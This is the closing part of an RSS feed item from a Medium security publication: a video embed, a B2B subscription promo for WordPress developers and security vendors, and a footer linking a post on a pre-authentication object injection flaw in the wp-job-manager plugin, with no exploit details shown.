src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fwww.youtube.com%2Fembed%2F79DijItQXMM%3Ffeature%3Doembed&amp;url=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D79DijItQXMM&amp;image=https%3A%2F%2Fi.ytimg.com%2Fvi%2F79DijItQXMM%2Fhqdefault.jpg&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=youtube" width="854" height="480" frameborder="0" scrolling="no"><a href="https://medium.com/media/b4cc4105782ce2449ed1ad4e02634ba3/href">https://medium.com/media/b4cc4105782ce2449ed1ad4e02634ba3/href</a></iframe><h4>Promo</h4><p>If you are wp developer or wp host provider or wp security product provider with valuable list of clients, we offer subscription list and we are exceptional (B2B only).</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=d90eafa6923b" width="1" height="1"><hr><p><a href="https://medium.com/websec/wp-job-manager-1-29-2-preauth-poi-unserialize-of-user-supplied-data-d90eafa6923b">wp-job-manager ≤ 1.29.2 preauth POI / unserialize of user supplied data</a> was originally published in <a href="https://medium.com/websec">websec</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
    </channel>
</rss>